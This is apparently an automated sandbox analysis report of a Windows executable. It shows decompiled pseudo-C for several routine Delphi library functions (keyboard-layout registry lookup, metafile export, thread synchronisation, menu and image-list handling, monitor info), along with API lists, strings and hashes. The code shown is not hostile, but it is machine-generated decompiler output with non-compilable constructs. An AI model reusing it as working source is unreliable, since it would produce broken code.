                                                                        Uniqueness Score: -1.00%

                                                                        Function 00454414, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E00454414(intOrPtr __eax, void* __ebx) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;

				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x4545bf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x4545c6);
					return E00404348( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E004035AC(1);
					E00404348(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E00416868( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E0044183C( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E004092EC( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x45457b);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E004045B0( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E004045B0(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x454582);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}




















                                                                        0x00454415
                                                                        0x00454417
                                                                        0x00454420
                                                                        0x00454426
                                                                        0x0045442b
                                                                        0x0045442c
                                                                        0x00454431
                                                                        0x00454434
                                                                        0x0045443e
                                                                        0x004545a0
                                                                        0x004545a8
                                                                        0x004545ab
                                                                        0x004545ae
                                                                        0x004545be
                                                                        0x00454444
                                                                        0x00454453
                                                                        0x0045445c
                                                                        0x0045446f
                                                                        0x00454472
                                                                        0x0045458f
                                                                        0x00454595
                                                                        0x0045459b
                                                                        0x00000000
                                                                        0x00454478
                                                                        0x00454479
                                                                        0x00454482
                                                                        0x00454485
                                                                        0x00454491
                                                                        0x00000000
                                                                        0x00454497
                                                                        0x004544a9
                                                                        0x004544af
                                                                        0x004544d9
                                                                        0x00000000
                                                                        0x004544df
                                                                        0x004544e1
                                                                        0x004544e2
                                                                        0x004544e7
                                                                        0x004544ea
                                                                        0x004544ed
                                                                        0x00454513
                                                                        0x00454526
                                                                        0x0045453e
                                                                        0x0045454c
                                                                        0x0045455f
                                                                        0x0045455f
                                                                        0x0045454c
                                                                        0x00454566
                                                                        0x00454569
                                                                        0x0045456c
                                                                        0x0045457a
                                                                        0x0045457a
                                                                        0x004544d9
                                                                        0x00000000
                                                                        0x00454582
                                                                        0x00454582
                                                                        0x00454586
                                                                        0x00454586
                                                                        0x00454586
                                                                        0x00000000
                                                                        0x00454485
                                                                        0x00454472
                                                                        0x00000000

                                                                        APIs
                                                                        • GetKeyboardLayoutList.USER32(00000040,?,00000000,004545BF,?,0215094C,?,00454621,00000000,?,00438B67), ref: 0045446A
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 004544D2
                                                                        • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,0045457B,?,80000002,00000000), ref: 0045450C
                                                                        • RegCloseKey.ADVAPI32(?,00454582,00000000,?,00000100,00000000,0045457B,?,80000002,00000000), ref: 00454575
                                                                        Strings
                                                                        • layout text, xrefs: 00454503
                                                                        • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 004544BC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                        • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                        • API String ID: 1703357764-2652665750
                                                                        • Opcode ID: 189765bfa51e4266e6c4d7a058433c68c56dc4b3013e98b6798dc43b9e3e9b53
                                                                        • Instruction ID: 2539a2497d52caec4cc5f2bae2980b59186013e12a04a0a3c27255b3f8e2aff6
                                                                        • Opcode Fuzzy Hash: 189765bfa51e4266e6c4d7a058433c68c56dc4b3013e98b6798dc43b9e3e9b53
                                                                        • Instruction Fuzzy Hash: 3D414174A0020DAFDB10DF55C981B9EB7F8EB88704F5144A6EA04EB352E734EE44DB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0042326C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 70%
                                                                        			E0042326C(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				struct HDC__* _t43;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t77;
				void* _t80;
				void* _t83;
				void* _t85;
				intOrPtr _t86;

				_t83 = _t85;
				_t86 = _t85 + 0xffffffdc;
				_t80 = __edx;
				_t65 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E00402EF0( &_v38, 0x16);
					_t67 =  *((intOrPtr*)(_t65 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t67 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_t43 = E00421870( &_v38);
					_v18 = _t43;
					_push(0);
					L00406EB4();
					_v16 = _t43;
					_push(_t83);
					_push(0x4233a7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
					_v8 = E00402754(_v12);
					_push(_t83);
					_push(0x423387);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
						E00420A80(_t67);
					}
					E00416B7C(_t80, 0x16,  &_v38);
					E00416B7C(_t80, _v12, _v8);
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(E0042338E);
					return E00402774(_v8);
				}
			}






















                                                                        0x0042326d
                                                                        0x0042326f
                                                                        0x00423274
                                                                        0x00423276
                                                                        0x0042327c
                                                                        0x004233b3
                                                                        0x00423282
                                                                        0x0042328c
                                                                        0x00423291
                                                                        0x00423294
                                                                        0x0042329b
                                                                        0x004232a2
                                                                        0x004232ac
                                                                        0x004232a4
                                                                        0x004232a4
                                                                        0x004232a4
                                                                        0x004232c3
                                                                        0x004232da
                                                                        0x004232e1
                                                                        0x004232e6
                                                                        0x004232ea
                                                                        0x004232ec
                                                                        0x004232f1
                                                                        0x004232f6
                                                                        0x004232f7
                                                                        0x004232fc
                                                                        0x004232ff
                                                                        0x00423315
                                                                        0x00423320
                                                                        0x00423325
                                                                        0x00423326
                                                                        0x0042332b
                                                                        0x0042332e
                                                                        0x0042334b
                                                                        0x0042334d
                                                                        0x0042334d
                                                                        0x0042335c
                                                                        0x00423369
                                                                        0x00423370
                                                                        0x00423373
                                                                        0x00423376
                                                                        0x00423386
                                                                        0x00423386

                                                                        APIs
                                                                        • MulDiv.KERNEL32(?,?,000009EC), ref: 004232BE
                                                                        • MulDiv.KERNEL32(?,?,000009EC), ref: 004232D5
                                                                        • 72E7AC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 004232EC
                                                                        • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,004233A7,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00423310
                                                                        • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,00423387,?,?,00000000,00000000,00000008,?,00000000,004233A7), ref: 00423343
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: BitsFileMeta
                                                                        • String ID: `
                                                                        • API String ID: 858000408-2679148245
                                                                        • Opcode ID: 558b4f842d45610530c19de20ebe86704c1cece71444c5e02f9d3581222144b0
                                                                        • Instruction ID: 3839b95b636f5826239c880ae12cce9acd53ea68cca29137c77ea4b08317ef11
                                                                        • Opcode Fuzzy Hash: 558b4f842d45610530c19de20ebe86704c1cece71444c5e02f9d3581222144b0
                                                                        • Instruction Fuzzy Hash: 7D314775B00258ABDB00DFD5D881AAEB7B8EF08704F514096F904EB291D6789E40D7A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041C0B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 73%
                                                                        			E0041C0B0() {
				char _v5;
				intOrPtr* _v12;
				char _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t16;
				char _t19;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t24;
				intOrPtr _t34;
				void* _t39;
				intOrPtr _t46;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr _t51;
				void* _t53;
				void* _t55;
				void* _t58;
				void* _t60;
				intOrPtr _t61;

				_t58 = _t60;
				_t61 = _t60 + 0xfffffff0;
				_push(_t39);
				_push(_t55);
				_push(_t53);
				_t16 = GetCurrentThreadId();
				_t47 =  *0x495c4c; // 0x496030
				if(_t16 !=  *_t47) {
					_v20 = GetCurrentThreadId();
					_v16 = 0;
					_t46 =  *0x495acc; // 0x410438
					E0040A274(_t39, _t46, 1, _t53, _t55, 0,  &_v20);
					E00403DA8();
				}
				if( *0x496a00 == 0) {
					_v5 = 0;
					return _v5;
				} else {
					_push(0x496a04);
					L004068AC();
					_push(_t58);
					_push(0x41c1c6);
					_push( *[fs:eax]);
					 *[fs:eax] = _t61;
					if( *0x47a4b8 == 0) {
						L5:
						_t19 = 0;
					} else {
						_t34 =  *0x47a4b8; // 0x0
						if( *((intOrPtr*)(_t34 + 8)) > 0) {
							_t19 = 1;
						} else {
							goto L5;
						}
					}
					_v5 = _t19;
					if(_v5 != 0) {
						while(1) {
							_t21 =  *0x47a4b8; // 0x0
							if( *((intOrPtr*)(_t21 + 8)) <= 0) {
								break;
							}
							_t22 =  *0x47a4b8; // 0x0
							_v12 = E00414208(_t22, 0);
							_t24 =  *0x47a4b8; // 0x0
							E004140F8(_t24, 0);
							 *[fs:eax] = _t61;
							 *((intOrPtr*)( *_v12 + 0x20))( *[fs:eax], 0x41c179, _t58);
							_pop(_t51);
							 *[fs:eax] = _t51;
							SetEvent( *(_v12 + 4));
						}
						 *0x496a00 = 0;
					}
					_pop(_t48);
					 *[fs:eax] = _t48;
					_push(E0041C1D1);
					_push(0x496a04);
					L004069F4();
					return 0;
				}
			}



























                                                                        0x0041c0b1
                                                                        0x0041c0b3
                                                                        0x0041c0b6
                                                                        0x0041c0b7
                                                                        0x0041c0b8
                                                                        0x0041c0b9
                                                                        0x0041c0be
                                                                        0x0041c0c6
                                                                        0x0041c0cd
                                                                        0x0041c0d0
                                                                        0x0041c0da
                                                                        0x0041c0e7
                                                                        0x0041c0ec
                                                                        0x0041c0ec
                                                                        0x0041c0f8
                                                                        0x0041c1cd
                                                                        0x0041c1da
                                                                        0x0041c0fe
                                                                        0x0041c0fe
                                                                        0x0041c103
                                                                        0x0041c10a
                                                                        0x0041c10b
                                                                        0x0041c110
                                                                        0x0041c113
                                                                        0x0041c11d
                                                                        0x0041c12a
                                                                        0x0041c12a
                                                                        0x0041c11f
                                                                        0x0041c11f
                                                                        0x0041c128
                                                                        0x0041c12e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0041c128
                                                                        0x0041c130
                                                                        0x0041c137
                                                                        0x0041c19c
                                                                        0x0041c19c
                                                                        0x0041c1a5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0041c13d
                                                                        0x0041c147
                                                                        0x0041c14c
                                                                        0x0041c151
                                                                        0x0041c161
                                                                        0x0041c16c
                                                                        0x0041c171
                                                                        0x0041c174
                                                                        0x0041c197
                                                                        0x0041c197
                                                                        0x0041c1a7
                                                                        0x0041c1a7
                                                                        0x0041c1b0
                                                                        0x0041c1b3
                                                                        0x0041c1b6
                                                                        0x0041c1bb
                                                                        0x0041c1c0
                                                                        0x0041c1c5
                                                                        0x0041c1c5

                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0041C0B9
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0041C0C8
                                                                        • RtlEnterCriticalSection.KERNEL32(00496A04,?,?,00000000), ref: 0041C103
                                                                        • SetEvent.KERNEL32(?,?,00496A04,?,?,00000000), ref: 0041C197
                                                                        • RtlLeaveCriticalSection.KERNEL32(00496A04,0041C1D1,00496A04,?,?,00000000), ref: 0041C1C0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CriticalCurrentSectionThread$EnterEventLeave
                                                                        • String ID: 0`I
                                                                        • API String ID: 130076905-2983702033
                                                                        • Opcode ID: d0ef8c18c672c5093def7dce1c420b319e01ce4750e548a04579464797611688
                                                                        • Instruction ID: d3fc0090a8b2a4d8759e39c8523565b2f55ac54e1dab5fd3bc4b06f7a5c1992e
                                                                        • Opcode Fuzzy Hash: d0ef8c18c672c5093def7dce1c420b319e01ce4750e548a04579464797611688
                                                                        • Instruction Fuzzy Hash: 53314634284240AFD701DB64DC85BAE7BE4EB4A314F2680BBE405936A2C77D58D5CB2D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004467FC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004467FC(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E004467FC(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E0044692C(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E0044692C(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E0044692C(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E004466C8(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x44531c; // 0x445368
						if(E00403768( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0044692C(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}









                                                                        0x004467fc
                                                                        0x00446800
                                                                        0x00446806
                                                                        0x00446810
                                                                        0x00446812
                                                                        0x00000000
                                                                        0x00446812
                                                                        0x0044681b
                                                                        0x00446820
                                                                        0x00000000
                                                                        0x00446822
                                                                        0x00446834
                                                                        0x00446839
                                                                        0x0044683d
                                                                        0x00446842
                                                                        0x0044684b
                                                                        0x00446855
                                                                        0x0044685c
                                                                        0x0044686c
                                                                        0x00446871
                                                                        0x00446871
                                                                        0x00446873
                                                                        0x00446874
                                                                        0x0044687a
                                                                        0x00446880
                                                                        0x004468b5
                                                                        0x004468b7
                                                                        0x004468bc
                                                                        0x00000000
                                                                        0x004468c2
                                                                        0x00446885
                                                                        0x00446892
                                                                        0x00000000
                                                                        0x004468a5
                                                                        0x004468a9
                                                                        0x004468b0
                                                                        0x00000000
                                                                        0x004468b0
                                                                        0x00446892
                                                                        0x0044687a
                                                                        0x004468c9

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: hSD
                                                                        • API String ID: 0-1503840404
                                                                        • Opcode ID: 1876fe4bb239e0ece3342b9e9a9a543713abc34dcbc0b90a04d39e0c55f526ff
                                                                        • Instruction ID: ba21534d86675a3933ba5c7ede87d647a4094e5fe0645c481f54663c532360df
                                                                        • Opcode Fuzzy Hash: 1876fe4bb239e0ece3342b9e9a9a543713abc34dcbc0b90a04d39e0c55f526ff
                                                                        • Instruction Fuzzy Hash: D2117871A0260596FB50BF3A9C0575B7B989F43749F06442BBC01A7387CA7DCC09865F
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043E484, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 31%
                                                                        			E0043E484(void* __eax) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				char _t19;
				intOrPtr* _t21;
				void* _t23;
				intOrPtr* _t26;
				void* _t28;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x495998; // 0x496a9c
					_t17 =  *0x495998; // 0x496a9c
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L00426A90();
					_v8 = _t19;
					_push(_t49);
					_push(0x43e544);
					_push( *[fs:eax]);
					 *[fs:eax] = _t52;
					_t21 =  *0x495c2c; // 0x496c08
					_t23 = E0045469C( *_t21,  *((short*)(__eax + 0x68)));
					_t4 =  &_v8; // 0x434646
					E00426AC8( *_t4, _t23);
					_t26 =  *0x495c2c; // 0x496c08
					_t28 = E0045469C( *_t26,  *((short*)(_t39 + 0x68)));
					_t6 =  &_v8; // 0x434646
					E00426AC8( *_t6, _t28);
					_push(0);
					_push(0);
					_push(0);
					_t7 =  &_v8; // 0x434646
					_push( *_t7);
					L00426B20();
					_push( &_v16);
					_push(0);
					L00426B30();
					_push(_v12);
					_push(_v16);
					_push(1);
					_t11 =  &_v8; // 0x434646
					_push( *_t11);
					L00426B20();
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x43e54b);
					_t12 =  &_v8; // 0x434646
					_t37 =  *_t12;
					_push(_t37);
					L00426A98();
					return _t37;
				}
			}



















                                                                        0x0043e485
                                                                        0x0043e487
                                                                        0x0043e48b
                                                                        0x0043e492
                                                                        0x0043e54f
                                                                        0x0043e498
                                                                        0x0043e4a0
                                                                        0x0043e4ac
                                                                        0x0043e4b3
                                                                        0x0043e4b5
                                                                        0x0043e4b6
                                                                        0x0043e4bb
                                                                        0x0043e4c0
                                                                        0x0043e4c1
                                                                        0x0043e4c6
                                                                        0x0043e4c9
                                                                        0x0043e4d0
                                                                        0x0043e4d7
                                                                        0x0043e4de
                                                                        0x0043e4e1
                                                                        0x0043e4ea
                                                                        0x0043e4f1
                                                                        0x0043e4f8
                                                                        0x0043e4fb
                                                                        0x0043e500
                                                                        0x0043e502
                                                                        0x0043e504
                                                                        0x0043e506
                                                                        0x0043e509
                                                                        0x0043e50a
                                                                        0x0043e512
                                                                        0x0043e513
                                                                        0x0043e515
                                                                        0x0043e51d
                                                                        0x0043e521
                                                                        0x0043e522
                                                                        0x0043e524
                                                                        0x0043e527
                                                                        0x0043e528
                                                                        0x0043e52f
                                                                        0x0043e532
                                                                        0x0043e535
                                                                        0x0043e53a
                                                                        0x0043e53a
                                                                        0x0043e53d
                                                                        0x0043e53e
                                                                        0x0043e543
                                                                        0x0043e543

                                                                        APIs
                                                                        • 73451AB0.COMCTL32(00000000), ref: 0043E4B6
                                                                          • Part of subcall function 00426AC8: 73452140.COMCTL32(FFC,000000FF,00000000,0043E4E6,00000000,0043E544,?,00000000), ref: 00426ACC
                                                                        • 73451680.COMCTL32(FFC,00000000,00000000,00000000,00000000,0043E544,?,00000000), ref: 0043E50A
                                                                        • 73451710.COMCTL32(00000000,?,FFC,00000000,00000000,00000000,00000000,0043E544,?,00000000), ref: 0043E515
                                                                        • 73451680.COMCTL32(FFC,00000001,?,0043E5AD,00000000,?,FFC,00000000,00000000,00000000,00000000,0043E544,?,00000000), ref: 0043E528
                                                                        • 73451F60.COMCTL32(FFC,0043E54B,0043E5AD,00000000,?,FFC,00000000,00000000,00000000,00000000,0043E544,?,00000000), ref: 0043E53E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: 7345173451680$7345171073452140
                                                                        • String ID: FFC
                                                                        • API String ID: 821207058-3265319113
                                                                        • Opcode ID: c553ae45f4f59dda8c743e9a5beeb43619ad60567a59fbf0dee4961d1089d07a
                                                                        • Instruction ID: 8431b77a0cc210c779f3d261e8a6c9ecaf50c2f7b8c230ae1f7395ec22db308d
                                                                        • Opcode Fuzzy Hash: c553ae45f4f59dda8c743e9a5beeb43619ad60567a59fbf0dee4961d1089d07a
                                                                        • Instruction Fuzzy Hash: 48218174740214BFDB00EBE9DC92F6977F8EB49704F6044A6F904EB291DA79AD40CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0042761C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 47%
                                                                        			E0042761C(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x496ac9 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A9C();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x496ab0; // 0x42761c
					 *0x496ab0 = E00427218(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x496ab0(_t27, _t29);
				}
				return _t24;
			}














                                                                        0x00427625
                                                                        0x00427628
                                                                        0x00427632
                                                                        0x00427657
                                                                        0x0042765f
                                                                        0x0042767f
                                                                        0x00427684
                                                                        0x0042768f
                                                                        0x0042769a
                                                                        0x004276a4
                                                                        0x004276a5
                                                                        0x004276a6
                                                                        0x004276a7
                                                                        0x004276a8
                                                                        0x004276a9
                                                                        0x004276b3
                                                                        0x004276b5
                                                                        0x004276bd
                                                                        0x004276be
                                                                        0x004276be
                                                                        0x004276c3
                                                                        0x004276c3
                                                                        0x00427634
                                                                        0x00427639
                                                                        0x00427646
                                                                        0x00427653
                                                                        0x00427653
                                                                        0x004276cd

                                                                        APIs
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00427674
                                                                        • GetSystemMetrics.USER32 ref: 00427689
                                                                        • GetSystemMetrics.USER32 ref: 00427694
                                                                        • lstrcpy.KERNEL32(?,DISPLAY), ref: 004276BE
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                        • String ID: DISPLAY$GetMonitorInfoA
                                                                        • API String ID: 2545840971-1370492664
                                                                        • Opcode ID: 29cf01dcd43958f641ba807ef5d29dee25e5501a003724a3729d2d1307860ead
                                                                        • Instruction ID: fbb31de7d48d14f86b9486c0f2b6d2713dbdd219238fa15b14bdad62d3ba1336
                                                                        • Opcode Fuzzy Hash: 29cf01dcd43958f641ba807ef5d29dee25e5501a003724a3729d2d1307860ead
